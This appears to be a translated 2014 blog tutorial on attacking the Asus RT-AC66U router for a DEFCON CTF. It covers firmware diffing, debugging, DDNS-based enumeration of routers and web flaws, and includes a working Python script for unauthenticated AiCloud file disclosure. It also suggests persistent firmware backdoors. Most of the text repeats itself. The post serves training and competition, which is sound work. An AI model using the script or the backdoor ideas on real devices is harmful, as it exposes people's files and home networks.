July 21, 2014 at 13:02Hack Asus RT-AC66U and get ready for SOHOpelesslyBroken CTF
- Transfer
Finally it was July, time to get ready for DEFCON. Follow @defconparties on Twitter and decide which places to visit and which reports to go to.
This year there will be a new competition - SOHOpelesslyBroken , from ISE and EFF. The goal of Track 0 is to show previously unknown vulnerabilities in home wireless routers. Track 1 will be in CTF mode right during DEFCON. CTFs are always very funny, and specifically this implies breaking into real iron, which is doubly more fun!
Yeah, this is my workplace = P
I'm very interested in the EFF Open Wireless Router(translator, by the way, too), but they still don’t tell anything about the device. The rules of the competition appears ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] as a possible device for hacking. I have an extra RT-AC66U at home, so I decided to write a small tutorial for all participants ofthe CTF competition
First of all, you need to find the firmware and its source code. Fortunately, the Asus RT-AC66U is licensed under the GPL, and it’s easy to find the source code for the firmware on the Internet. The version used in CTF is old, from 2012. To analyze the firmware better, we will take the firmware and source versions from v3.0.0.4.266 to v3.0.0.4.376.1123 (the latest version at the time of writing):
Asus RT-AC66u v3.0.0.4.266 - firmware
Asus RT-AC66u v3 .0.0.4.266 - source code of
Asus RT-AC66u v3.0.0.4.376.1123 - firmware
Asus RT-AC66u v3.0.0.4.376.1123 - source code
Many firmware updates were released between these two versions, so we will see the history of their changes :
www.asus.com/Networking/RTAC66U/HelpDesk_Download
According to the rules of the competition, we must detect and exploit the 0-day vulnerability. You can combine several different vulnerabilities to score more points. If the manufacturer patched the vulnerability without reporting it, and you were able to exploit it, then it will still be considered a 0-day vulnerability (let's not discuss terminology).
So, we have the source code, it is time to unpack and examine it. Trail of Bits' CTF Field Guide provides good resources for auditing source code . You can use utilities like Beyond Compare , Araxis Merge and WinMerge on Windows, or Meld if you are using Linux.
We will work with the directory "/ asuswrt / release / src / router /". Compare the two versions through Meld: This router already has many vulnerabilities discovered. If you want to find 0-day, you need to make sure that the vulnerability is not found before you (and, believe me, this is the most difficult part). As an example:
You will be taken away a certain amount of points if your exploits require a special system configuration or special information. So, if you want to score a lot of points, you should focus on the standard configuration of services and processes. In the “USB Applications” tab of the RT-AC66U, you can configure some services, such as FTP, DLNA, NFS and Samba. MiniDLNA is also a great target. Vulnerabilities can easily be found in it using Zachary Cutlip 's research , as he broke this program several times. Another potentially vulnerable service is AiCloud - it connects your home network to online storage and gives access from a mobile device:
As part of the team examines the source code, forensics specialists will unzip the firmware using binwalk and fmk: you can remember binwally , a utility that I wrote to find the difference between two binary trees using fuzzy hashing . Binwalk has its own option for fuzzy hashing between files and directories. Most manufacturers (like Asus) do not open the entire code. You may have to reverse drivers and binaries to find a good vulnerability. The binary with the name “ACSD” is most interesting because it was removed from new firmware versions (v3.0.0.4.374.130 +) due to the vulnerability found by Jacob Holcomb .
Binaries for MIPS Little Endian. Also, it’s important to find out more about the file system. The OpenWRT Wiki has a great article on flash memory layout . Linux MTD gives you access to flash devices and allows you to create full-fledged file systems on them. You can go ssh to the device and see the markup: The NVRAM section is very valuable to us, it stores all the device settings. You can see its contents simply by dumping the section (mtd1) you need or by running the nvram show command : Pmon is another interesting section. It contains data compressed by LZMA, which the bootloader uses to restore the firmware if the update is unsuccessful.
Time to start hacking something. We need utilities like gdb, gdbserver and strace to start debugging binaries. We can either cross-compile them, or configure Optware / Entware and install the assembled packages. Wanduck (GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router / rc / wanduck.c) is a rather interesting process for analysis. It starts by default and will raise a pseudo HTTP server on port 18017. This HTTP server redirects each request to the main interface and, for some reason, drops all requests that end in ".ico". Let's see why he does this - run gdbserver remotely (gdbserver --multi localhost: 12345 &) and connect with any debugger of your choice. If you are using IDA Pro, open the binary and set the processor type to “mipsrl”.
Find the handle_http_req function and set a breakpoint on the dst_url comparison: Enter host and port gdbserver in the Debugger / Process Options menu and join the desired PID. Continue the process (F9) and execute an HTTP request to 192.168.1.1/x.ico . The debugger stops at a given breakpoint and you can look at the registers and memory. If you want to find other targets for research, look for them in the “prebuilt” directory inside “GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router /”. Some interesting binaries:
AiCloud mobile application may reveal more interesting information about the operation of the device. If you reverse the APK, or use an intercepting proxy, you can get the application’s primary HTTP request: Did you notice the strange parameter ddns_hostname? The task of cryptography =) (the translator does not think so).
A POST request attempts to register a new Dynamic DNS address for the device using the asuscomm.com service. If we look for this line in the source code of RT-AC66U, we can easily find the function that generates the DDNS address:
According to information from WikiDev , RT-AC66U uses the following organization identifiers in MAC addresses:
Using this information, we can map the IP address of each router using AiCloud. Just generate a list of all possible MAC addresses and sort through the DNS names with a mubix trick . If you are too lazy to run the command, you can search for “asuscomm.com” on Shodan . AiCloud works by default on ports 8082 and 443. The fact that anyone can easily get a list of routers that have this service running should be troubling, right?
Another interesting cryptographic warm-up can be an analysis of the algorithm for generating a WPS PIN device. You can get the current PIN and secret_code by running the nvram show | grep -E secret_code | wps_device_pin ". Look for these values in the source code and use the information received to write keygen (and do not forget to add chiptune from pouet.net ). You can also check the entropy of keys generated on the device. Look at the slides “ Fast Internet- wide Scanning and its Security Applications ” to get a couple of ideas.
There are so many web penetration testing techniques that I will only focus on a couple of them. The router interface has no protection against CSRF. There is also a traditional injection in the ping team and a bunch of XSS vectors.
The HTTP daemon is based on microhttpd. There is basic protection against exiting the directory in httpd.c: We can shamelessly steal the idea of hackerfantastic and test potential protection bypasses:
There are some MIME handlers in the web server that “should have been removed”
The get_webdavInfo.asp file is accessible without authentication and displays a large amount of important information about the device and network: We can change the values of the variables in nvram to set the XSS backdoor on this page, for example: Some operations use the functions nvram_get and nvram_safe_get. Settings are saved through the nvram_set function. If the router does not screen the data that it receives with NVRAM, then you can do something like NVRAM injection (% 0A,% 0D and `reboot` will always be your helpers in this matter). AiCloud is a very vulnerable service that can be easily exploited.
. As soon as you activate it in the settings, lighttpd is launched on the router on port 8082 (or 443 on new firmware versions) and offers to give access to your files online. The trick is that the login and password dialog can be bypassed by adding / smb / to the URL (read the source!) I wrote a small script to use this bug in AiCloud on RT-AC66U v3.0.0.4.266. It receives all files and paths on the router, including from USB devices.
And finally, do not forget to compare the difference in the files in the www directory. This path contains all the components and scripts that are used in the web interface.
Why not try to open the cover of the router without damaging the warranty seal? To do this, you will need advice from the guys from the DEFCON Tamber Evident Village .
Hacking Asus RT-AC66U is a great exercise for beginners to crack routers. Most of the source code is freely available, and you can find a bunch of exploits and vulnerability descriptions for it. You might not have noticed, but we tested every item from OWASP Internet of Things Top 10 . Rumor has it that this router will be part of the base part of OWASP IoT Webgoat and Damn Vulnerable Embedded Linux.
Here are a couple of approaches that can give you extra points in the competition:
There are still a bunch of things that I want to write about, but I will keep them for the next posts. If you intend to participate in SOHOpelesslyBroken CTF and find this article useful, you can kick me and drink coffee with me at any time during DEFCON / BsidesLV / Blackhat =)
This year there will be a new competition - SOHOpelesslyBroken , from ISE and EFF. The goal of Track 0 is to show previously unknown vulnerabilities in home wireless routers. Track 1 will be in CTF mode right during DEFCON. CTFs are always very funny, and specifically this implies breaking into real iron, which is doubly more fun!
Yeah, this is my workplace = P
I'm very interested in the EFF Open Wireless Router(translator, by the way, too), but they still don’t tell anything about the device. The rules of the competition appears ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] as a possible device for hacking. I have an extra RT-AC66U at home, so I decided to write a small tutorial for all participants of
Intelligence service
First of all, you need to find the firmware and its source code. Fortunately, the Asus RT-AC66U is licensed under the GPL, and it’s easy to find the source code for the firmware on the Internet. The version used in CTF is old, from 2012. To analyze the firmware better, we will take the firmware and source versions from v3.0.0.4.266 to v3.0.0.4.376.1123 (the latest version at the time of writing):
Asus RT-AC66u v3.0.0.4.266 - firmware
Asus RT-AC66u v3 .0.0.4.266 - source code of
Asus RT-AC66u v3.0.0.4.376.1123 - firmware
Asus RT-AC66u v3.0.0.4.376.1123 - source code
Many firmware updates were released between these two versions, so we will see the history of their changes :
www.asus.com/Networking/RTAC66U/HelpDesk_Download
According to the rules of the competition, we must detect and exploit the 0-day vulnerability. You can combine several different vulnerabilities to score more points. If the manufacturer patched the vulnerability without reporting it, and you were able to exploit it, then it will still be considered a 0-day vulnerability (let's not discuss terminology).
So, we have the source code, it is time to unpack and examine it. Trail of Bits' CTF Field Guide provides good resources for auditing source code . You can use utilities like Beyond Compare , Araxis Merge and WinMerge on Windows, or Meld if you are using Linux.
We will work with the directory "/ asuswrt / release / src / router /". Compare the two versions through Meld: This router already has many vulnerabilities discovered. If you want to find 0-day, you need to make sure that the vulnerability is not found before you (and, believe me, this is the most difficult part). As an example:
- ASUS RT-AC66U Remote Root (Broadcom ACSD)
- ASUS RT-N66U Router - HTTPS Directory traversal and full file access and credential disclosure vuln
- Asus RT56U Remote Command Injection
- Taking over the ASUS RT-N56U and RT-AC66U
- Dear Asus router user: You've been pwned, thanks to easily exploited flaw (Asusgate)
- OSVDB
You will be taken away a certain amount of points if your exploits require a special system configuration or special information. So, if you want to score a lot of points, you should focus on the standard configuration of services and processes. In the “USB Applications” tab of the RT-AC66U, you can configure some services, such as FTP, DLNA, NFS and Samba. MiniDLNA is also a great target. Vulnerabilities can easily be found in it using Zachary Cutlip 's research , as he broke this program several times. Another potentially vulnerable service is AiCloud - it connects your home network to online storage and gives access from a mobile device:
Forensic
As part of the team examines the source code, forensics specialists will unzip the firmware using binwalk and fmk: you can remember binwally , a utility that I wrote to find the difference between two binary trees using fuzzy hashing . Binwalk has its own option for fuzzy hashing between files and directories. Most manufacturers (like Asus) do not open the entire code. You may have to reverse drivers and binaries to find a good vulnerability. The binary with the name “ACSD” is most interesting because it was removed from new firmware versions (v3.0.0.4.374.130 +) due to the vulnerability found by Jacob Holcomb .
Binaries for MIPS Little Endian. Also, it’s important to find out more about the file system. The OpenWRT Wiki has a great article on flash memory layout . Linux MTD gives you access to flash devices and allows you to create full-fledged file systems on them. You can go ssh to the device and see the markup: The NVRAM section is very valuable to us, it stores all the device settings. You can see its contents simply by dumping the section (mtd1) you need or by running the nvram show command : Pmon is another interesting section. It contains data compressed by LZMA, which the bootloader uses to restore the firmware if the update is unsuccessful.
Breaking
Time to start hacking something. We need utilities like gdb, gdbserver and strace to start debugging binaries. We can either cross-compile them, or configure Optware / Entware and install the assembled packages. Wanduck (GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router / rc / wanduck.c) is a rather interesting process for analysis. It starts by default and will raise a pseudo HTTP server on port 18017. This HTTP server redirects each request to the main interface and, for some reason, drops all requests that end in ".ico". Let's see why he does this - run gdbserver remotely (gdbserver --multi localhost: 12345 &) and connect with any debugger of your choice. If you are using IDA Pro, open the binary and set the processor type to “mipsrl”.
Find the handle_http_req function and set a breakpoint on the dst_url comparison: Enter host and port gdbserver in the Debugger / Process Options menu and join the desired PID. Continue the process (F9) and execute an HTTP request to 192.168.1.1/x.ico . The debugger stops at a given breakpoint and you can look at the registers and memory. If you want to find other targets for research, look for them in the “prebuilt” directory inside “GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router /”. Some interesting binaries:
- / acsd / prebuilt / acsd
- / webdav_client / prebuilt / webdav_client
- / asuswebstorage / prebuilt / asuswebstorage
- / eapd / linux / prebuilt / eapd
- / nas / nas / prebuilt / nas
- / flash / prebuilt / flash
- / et / prebuilt / et
- / wps / prebuilt / wps_monitor
- / ated / prebuilt / ated
- / wlconf / prebuilt / wlconf
AiCloud mobile application may reveal more interesting information about the operation of the device. If you reverse the APK, or use an intercepting proxy, you can get the application’s primary HTTP request: Did you notice the strange parameter ddns_hostname? The task of cryptography =) (the translator does not think so).
Cryptography
A POST request attempts to register a new Dynamic DNS address for the device using the asuscomm.com service. If we look for this line in the source code of RT-AC66U, we can easily find the function that generates the DDNS address:
var isMD5DDNSName = function(){
var macAddr = '<% nvram_get("lan_hwaddr"); %>'.toUpperCase().replace(/:/g, "");
return "A"+hexMD5(macAddr).toUpperCase()+".asuscomm.com";
}According to information from WikiDev , RT-AC66U uses the following organization identifiers in MAC addresses:
- 08: 60: 6E (1 E, 1 W, 2011)
- 10: BF: 48 (1 E, 2 W, 2011)
- 30: 85: A9 (3 E, 3 W, 2011)
- 50: 46: 5D (1 E, 2 W, 2012)
Using this information, we can map the IP address of each router using AiCloud. Just generate a list of all possible MAC addresses and sort through the DNS names with a mubix trick . If you are too lazy to run the command, you can search for “asuscomm.com” on Shodan . AiCloud works by default on ports 8082 and 443. The fact that anyone can easily get a list of routers that have this service running should be troubling, right?
Another interesting cryptographic warm-up can be an analysis of the algorithm for generating a WPS PIN device. You can get the current PIN and secret_code by running the nvram show | grep -E secret_code | wps_device_pin ". Look for these values in the source code and use the information received to write keygen (and do not forget to add chiptune from pouet.net ). You can also check the entropy of keys generated on the device. Look at the slides “ Fast Internet- wide Scanning and its Security Applications ” to get a couple of ideas.
Web
There are so many web penetration testing techniques that I will only focus on a couple of them. The router interface has no protection against CSRF. There is also a traditional injection in the ping team and a bunch of XSS vectors.
The HTTP daemon is based on microhttpd. There is basic protection against exiting the directory in httpd.c: We can shamelessly steal the idea of hackerfantastic and test potential protection bypasses:
#include
#include
int main(int argc, char *argv[]){
char *file;
int len;
file = argv[1];
len = strlen(file);
if ( file[0] == '/' || strcmp( file, ".." ) == 0 || strncmp( file, "../", 3 ) == 0 || strstr( file, "/../" ) != (char*) 0 || strcmp( &(file[len-3]), "/.." ) == 0 )
{
printf ("Illegal filename: %s\n", file);
}
else
{
printf ("Accepted filename: %s\n", file);
}
return 0;
} There are some MIME handlers in the web server that “should have been removed”
// some should be removed
struct except_mime_handler except_mime_handlers[] = {
{ "QIS_*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "qis/*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "*.css", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "state.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "detect.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "popup.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "general.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "help.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "start_autodet.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "start_apply.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "start_apply2.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "setting_lan.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "httpd_check.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "status.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "automac.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "detecWAN.asp", MIME_EXCEPTION_NORESETTIME},
{ "detecWAN2.asp", MIME_EXCEPTION_NORESETTIME},
{ "WPS_info.asp", MIME_EXCEPTION_NORESETTIME},
{ "WAN_info.asp", MIME_EXCEPTION_NOAUTH_ALL|MIME_EXCEPTION_NORESETTIME},
{ "result_of_get_changed_status.asp", MIME_EXCEPTION_NORESETTIME},
{ "result_of_get_changed_status_QIS.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME},
{ "result_of_detect_client.asp", MIME_EXCEPTION_NORESETTIME},
{ "Nologin.asp", MIME_EXCEPTION_NOAUTH_ALL},
{ "alertImg.gif", MIME_EXCEPTION_NOAUTH_ALL},
{ "error_page.htm", MIME_EXCEPTION_NOAUTH_ALL},
{ "jquery.js", MIME_EXCEPTION_NOAUTH_ALL},
{ "gotoHomePage.htm", MIME_EXCEPTION_NOAUTH_ALL},
{ "update_appstate.asp", MIME_EXCEPTION_NOAUTH_ALL},
{ "update_cloudstatus.asp", MIME_EXCEPTION_NOAUTH_ALL},
{ "get_webdavInfo.asp", MIME_EXCEPTION_NOAUTH_ALL},
{ "*.gz", MIME_EXCEPTION_NOAUTH_ALL},
{ "*.tgz", MIME_EXCEPTION_NOAUTH_ALL},
{ "*.zip", MIME_EXCEPTION_NOAUTH_ALL},
{ "*.ipk", MIME_EXCEPTION_NOAUTH_ALL},
{ NULL, 0 }
};The get_webdavInfo.asp file is accessible without authentication and displays a large amount of important information about the device and network: We can change the values of the variables in nvram to set the XSS backdoor on this page, for example: Some operations use the functions nvram_get and nvram_safe_get. Settings are saved through the nvram_set function. If the router does not screen the data that it receives with NVRAM, then you can do something like NVRAM injection (% 0A,% 0D and `reboot` will always be your helpers in this matter). AiCloud is a very vulnerable service that can be easily exploited.
. As soon as you activate it in the settings, lighttpd is launched on the router on port 8082 (or 443 on new firmware versions) and offers to give access to your files online. The trick is that the login and password dialog can be bypassed by adding / smb / to the URL (read the source!) I wrote a small script to use this bug in AiCloud on RT-AC66U v3.0.0.4.266. It receives all files and paths on the router, including from USB devices.
#!/usr/bin/python
from bs4 import BeautifulSoup
import urllib2
import sys
def list_dir(url, start_dir):
try:
html_page = urllib2.urlopen(url+start_dir)
except urllib2.HTTPError as e:
print e
sys.exit(1)
soup = BeautifulSoup(html_page)
for link in soup.findAll('a'):
path = link.get('uhref')
if path != '../':
is_dir = link.get('isdir')
if is_dir == str('1'):
print url+path
list_dir(url,path)
else:
print url+path
nargs = len(sys.argv)
if nargs == 2:
url = sys.argv[1]
start_dir = "/smb"
elif nargs == 3:
url = sys.argv[1]
start_dir = str(sys.argv[2])
else:
print 'Asus RT-AC66U AiCloud Unauthenticated File Disclosure\
\nTested Firmwares: 3.0.0.4.266, 3.0.0.4.270 and 3.0.0.4.354\
\nDisclosed by Kyle Lovett\
\nScript by Bernardo Rodrigues - http://w00tsec.blogspot.com\
\nUsage: python %s http://url [path]' % sys.argv[0]
sys.exit(1)
list_dir(url, start_dir)
And finally, do not forget to compare the difference in the files in the www directory. This path contains all the components and scripts that are used in the web interface.
Bonus
Why not try to open the cover of the router without damaging the warranty seal? To do this, you will need advice from the guys from the DEFCON Tamber Evident Village .
Other (like conclusion)
Hacking Asus RT-AC66U is a great exercise for beginners to crack routers. Most of the source code is freely available, and you can find a bunch of exploits and vulnerability descriptions for it. You might not have noticed, but we tested every item from OWASP Internet of Things Top 10 . Rumor has it that this router will be part of the base part of OWASP IoT Webgoat and Damn Vulnerable Embedded Linux.
Here are a couple of approaches that can give you extra points in the competition:
- Overwriting bootloader code and creating dual-boot with backdoor
- Adding a backdoor to the firmware so that it does not get deleted when updating the firmware
- Rooting a router remotely
- Reprogramming LED to a game in PONG
There are still a bunch of things that I want to write about, but I will keep them for the next posts. If you intend to participate in SOHOpelesslyBroken CTF and find this article useful, you can kick me and drink coffee with me at any time during DEFCON / BsidesLV / Blackhat =)